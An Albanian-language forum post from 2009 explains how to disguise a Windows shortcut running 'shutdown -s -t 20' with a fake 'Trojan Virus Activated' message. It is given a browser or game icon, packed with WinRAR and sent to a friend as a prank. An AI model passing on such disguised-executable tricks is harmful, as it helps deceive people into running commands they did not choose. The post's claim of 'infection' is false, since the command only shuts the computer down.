Would you like to react to this message? Create an account in a few clicks or log in to continue.

  Si ta krioim nje Shourt per Fikjen e PC's

  avatar
  v-KS
  Administrator
  Administrator


  Age : 24
  Poenat : 2384
  Reputacioni : 32
  Numri i postimeve : 822

  Si ta krioim nje Shourt per Fikjen e PC's Empty Si ta krioim nje Shourt per Fikjen e PC's

  Mesazh nga v-KS Thu Aug 20, 2009 1:31 pm

  se parii krijon nje shortcut edhe pastaj e hapet nje tabel dhee e shenon attyyy pa thonjeza "shutdown -s -t 20 -c "Trojan Virus Activated" edhe e shenon emrin psh internet explorer edhe ja ndrron ikonen dhee e bon me winrar edhe ja qon ndonje shokuu dhee pastaj pasii qi ta bonn extract aiii dhe do klikoj mbii tee virusi per 20 sekonda do ti infektohet mund ta beniii me qfaro do ikonee psh loja muzik etj... kalofshi mir

   Ora është Tue Aug 16, 2022 8:13 pm